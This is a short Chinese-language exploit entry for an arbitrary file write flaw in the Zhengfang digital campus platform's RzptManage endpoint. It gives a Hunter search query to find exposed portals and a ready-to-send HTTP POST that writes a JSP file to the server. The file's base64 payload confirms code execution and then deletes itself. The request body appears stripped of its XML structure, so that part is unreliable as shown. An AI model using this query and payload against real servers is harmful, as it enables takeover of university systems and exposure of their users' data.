## 正方数字化校园平台RzptManage存在任意文件写入漏洞正方数字化校园平台RzptManage存在任意文件写入漏洞，攻击者可通过该漏洞获取服务器权限。 ## hunter ``` title="正方数字化校园信息门户"||title="数字化校园信息门户"||title="统一身份认证中心"&&body="正方"&&body="zfca/login"&&body="login_bg" ``` ## poc ``` POST /zfca/axis/RzptManage HTTP/1.1 Host: {hostname} User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0 Content-Length: 808 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Connection: close Content-Type: text/xml;charset=UTF-8 SOAPAction: Upgrade-Insecure-Requests: 1 zkimvsrr.jsp PCUgb3V0LnByaW50bG4oMTExKjExMSk7bmV3IGphdmEuaW8uRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKS5kZWxldGUoKTslPg== ``` 文件路径`/zfca/zkimvsrr.jsp`